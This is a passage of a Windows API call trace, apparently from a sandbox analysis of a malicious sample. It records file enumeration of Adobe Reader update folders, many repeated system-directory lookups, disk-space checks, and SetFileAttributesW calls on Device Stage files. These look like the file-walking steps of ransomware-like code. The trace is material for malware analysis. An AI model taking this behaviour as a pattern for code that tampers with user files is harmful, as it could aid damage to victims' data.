returned 1 [0135.622] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0135.622] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 0 [0135.622] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.622] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.622] CoTaskMemFree (pv=0x4e1c10) [0135.623] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.623] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0135.623] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0135.623] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.624] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0135.624] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.624] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.624] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.624] CoTaskMemFree (pv=0x4e1c10) [0135.626] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.626] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0135.626] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0135.626] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0135.627] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.629] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.629] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.629] CoTaskMemFree (pv=0x4e1c10) [0135.630] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.630] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.630] CoTaskMemFree (pv=0x4e1c10) [0135.631] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.631] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.631] CoTaskMemFree (pv=0x4e1c10) [0135.631] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.631] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.631] CoTaskMemFree (pv=0x4e1c10) [0135.632] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.632] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.632] CoTaskMemFree (pv=0x4e1c10) [0135.632] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.632] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.632] CoTaskMemFree (pv=0x4e1c10) [0135.633] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.633] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.633] CoTaskMemFree (pv=0x4e1c10) [0135.633] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.634] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.634] CoTaskMemFree (pv=0x4e1c10) [0135.634] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.634] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.634] CoTaskMemFree (pv=0x4e1c10) [0135.640] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.640] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.640] CoTaskMemFree (pv=0x4e1c10) [0135.641] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.641] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.641] CoTaskMemFree (pv=0x4e1c10) [0135.641] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.641] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.642] CoTaskMemFree (pv=0x4e1c10) [0135.642] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.642] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.642] CoTaskMemFree (pv=0x4e1c10) [0135.643] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.643] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.643] CoTaskMemFree (pv=0x4e1c10) [0135.644] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.644] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.644] CoTaskMemFree (pv=0x4e1c10) [0135.644] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.644] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.644] CoTaskMemFree (pv=0x4e1c10) [0135.646] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.646] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.646] CoTaskMemFree (pv=0x4e1c10) [0135.646] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.646] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.646] CoTaskMemFree (pv=0x4e1c10) [0135.647] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.647] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.648] CoTaskMemFree (pv=0x4e1c10) [0135.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.970] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x80) returned 0 [0135.972] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.977] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0135.978] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.988] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x80) returned 0 [0135.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.998] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x80) returned 0 [0136.000] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.008] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x80) returned 0 [0136.016] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.016] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.016] CoTaskMemFree (pv=0x4e1c10) [0136.017] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.032] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x80) returned 0 [0136.033] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.038] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0136.039] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.046] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", dwFileAttributes=0x80) returned 0 [0136.048] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.048] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.048] CoTaskMemFree (pv=0x4e1c10) [0136.048] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.048] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.049] CoTaskMemFree (pv=0x4e1c10) [0136.057] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.062] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x80) returned 0 [0136.064] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.070] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0136.071] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.071] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.071] CoTaskMemFree (pv=0x4e1c10) [0136.073] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0136.078] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0136.079] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.079] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.079] CoTaskMemFree (pv=0x4e1c10) [0136.087] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0136.094] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0136.096] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.096] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.096] CoTaskMemFree (pv=0x4e1c10) [0136.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0136.101] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0136.103] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.103] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.103] CoTaskMemFree (pv=0x4e1c10) [0136.104] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.104] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.104] CoTaskMemFree (pv=0x4e1c10) [0136.104] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.104] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.105] CoTaskMemFree (pv=0x4e1c10) [0136.105] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.105] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.105] CoTaskMemFree (pv=0x4e1c10) [0136.106] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.106] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.106] CoTaskMemFree (pv=0x4e1c10) [0136.106] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.106] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.107] CoTaskMemFree (pv=0x4e1c10) [0136.108] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.108] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.108] CoTaskMemFree (pv=0x4e1c10) [0136.108] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.108] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.108] CoTaskMemFree (pv=0x4e1c10) [0136.109] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.109] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.109] CoTaskMemFree (pv=0x4e1c10) [0136.109] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.109] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.110] CoTaskMemFree (pv=0x4e1c10) [0136.110] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.110] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.110] CoTaskMemFree (pv=0x4e1c10) [0136.111] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.111] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.111] CoTaskMemFree (pv=0x4e1c10) [0136.111] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.112] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.112] CoTaskMemFree (pv=0x4e1c10) [0136.112] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.112] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.113] CoTaskMemFree (pv=0x4e1c10) [0136.114] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.114] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.114] CoTaskMemFree (pv=0x4e1c10) [0136.114] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.114] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.115] CoTaskMemFree (pv=0x4e1c10) [0136.115] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.115] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.115] CoTaskMemFree (pv=0x4e1c10) [0136.116] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.116] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.116] CoTaskMemFree (pv=0x4e1c10) [0136.116] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.116] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.116] CoTaskMemFree (pv=0x4e1c10) [0136.221] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.221] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.221] CoTaskMemFree (pv=0x4e1c10) [0136.223] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.223] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.223] CoTaskMemFree (pv=0x4e1c10) [0136.230] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.230] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.230] CoTaskMemFree (pv=0x4e1c10) [0136.236] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.236] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.236] CoTaskMemFree (pv=0x4e1c10) [0136.237] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.237] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.237] CoTaskMemFree (pv=0x4e1c10) [0136.238] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.238] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.238] CoTaskMemFree (pv=0x4e1c10) [0136.238] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0136.238] GetSystemDirectoryW (in: 